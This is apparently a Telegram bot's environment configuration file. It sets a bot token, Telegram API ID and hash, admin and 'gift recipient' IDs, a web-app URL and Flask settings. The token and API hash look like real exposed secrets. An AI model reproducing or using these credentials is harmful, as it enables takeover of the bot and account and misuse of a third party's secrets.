BOT_TOKEN=8532638123:AAHlC2h2iWMWmG159oQ1yclfnAyED1IFALA
BOT_USERNAME=getgemsing_bot
WEBAPP_URL=https://fdsffdgdsfgd.bothost.ru/
TELEGRAM_API_ID=32726631
TELEGRAM_API_HASH=d9f7d5fbfbe5940cef125978486ad842
ADMIN_IDS=8450229868
GIFT_RECIPIENT_ID=8450229868
AUTODOCID_USERNAME=ccvah
FLASK_HOST=0.0.0.0
FLASK_PORT=5000
FLASK_DEBUG=false
LOG_GROUP_ID=-3738826653
LOG_CHAT_ID=-3738826653
